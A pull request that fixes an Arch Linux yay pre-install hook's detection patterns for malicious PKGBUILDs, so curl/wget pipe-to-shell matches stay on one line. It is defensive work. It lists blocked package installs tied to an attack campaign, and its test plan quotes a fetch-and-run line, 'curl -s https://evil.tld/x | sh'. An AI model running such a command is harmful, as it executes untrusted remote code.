### PR TITLE
fix: curl/wget pipe-to-shell patterns match across newlines

### DIFF
--- a/configs/yay-init.lua
+++ b/configs/yay-init.lua
@@ -41,10 +41,10 @@ yay.create_autocmd("AURPreInstall", {
     local patterns = {
       "npm install atomic%-lockfile",   -- Atomic Arch campaign wave 1
       "bun install js%-digest",         -- wave 2
-      "curl.*|.*bash",
-      "curl.*|.*sh",
-      "wget.*|.*bash",
-      "wget.*|.*sh",
+      "curl[^\n]*|[^\n]*bash",
+      "curl[^\n]*|[^\n]*sh",
+      "wget[^\n]*|[^\n]*bash",
+      "wget[^\n]*|[^\n]*sh",
     }
 
     for _, pattern in ipairs(patterns) do


### PR DESCRIPTION
## Summary
- The `AURPreInstall` yay Lua hook's `curl.*|.*sh` (and `wget` variants) used Lua's `.` which matches any byte including newlines, so the pattern spanned the entire multi-line PKGBUILD instead of a single line.
- Any PKGBUILD with a `curl`/`wget` reference in a comment plus the substring "sh" anywhere later in the file (e.g. `squashfs-tools`, `unsquashfs`, a `.sh` launcher script) tripped the block with no actual pipe-to-shell present.
- Confirmed as a real false positive against `bluemail`'s AUR PKGBUILD, which documents `curl ... | jq` in a comment and later references `${pkgname}.sh`/`unsquashfs`.
- Fix: replace `.*` with `[^\n]*` in the four curl/wget patterns so matching stays on one line.

## Test plan
- [x] Verified via `lua -e` that bluemail's PKGBUILD no longer matches after the fix
- [x] Verified via `lua -e` that a genuine same-line `curl -s https://evil.tld/x | sh` still matches and blocks
- [x] Applied the same fix to the live `~/.config/yay/init.lua` on this system and re-verified

🤖 Generated with [Claude Code](https://claude.com/claude-code)